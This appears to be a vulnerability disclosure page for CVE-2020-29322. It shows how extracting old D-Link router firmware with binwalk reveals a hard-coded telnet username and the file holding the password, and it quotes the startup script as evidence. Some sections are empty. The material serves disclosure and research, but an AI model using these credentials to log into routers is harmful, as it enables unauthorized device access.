block-quote On this pagechevron-down
copy Copy chevron-down
Exploits / PoC's chevron-right D-Link CVE-2020-29322 A series of old D-Link routers are vulnerable to credentials disclosure in telnet service through decompilation of firmware, allowing an unauthenticated attacker to access the telnet service.
Confirmed devices and firmware versions:
Download DIR-300 firmware version 2.06arrow-up-right and extract it using binwalk.
Copy » binwalk -e dir300b_v2.06_f4la.bin Username, Alphanetworks , is hard-coded under etc/scripts/misc/telnetd.sh:
Copy » cat etc/scripts/misc/telnetd.sh
#! /bin/sh
image_sign = ` cat /etc/config/image_sign `
TELNETD = ` rgdb -g /sys/telnetd `
if [ " $TELNETD " = " true " ]; then
echo " Start telnetd ... " > /dev/console
if [ -f " /usr/sbin/login " ]; then
lf = ` rgdb -i -g /runtime/layout/lanif `
telnetd -l " /usr/sbin/login " -u Alphanetworks: $image_sign -i $lf &
else
telnetd &
fi
fi And the password is referenced to etc/config/image_sign:
Download DIR-880L firmware version 1.07arrow-up-right and extract it using binwalk.
Username, Alphanetworks , is hard-coded under etc/init0.d/S80telnetd.sh:
And the password is referenced to etc/config/image_sign: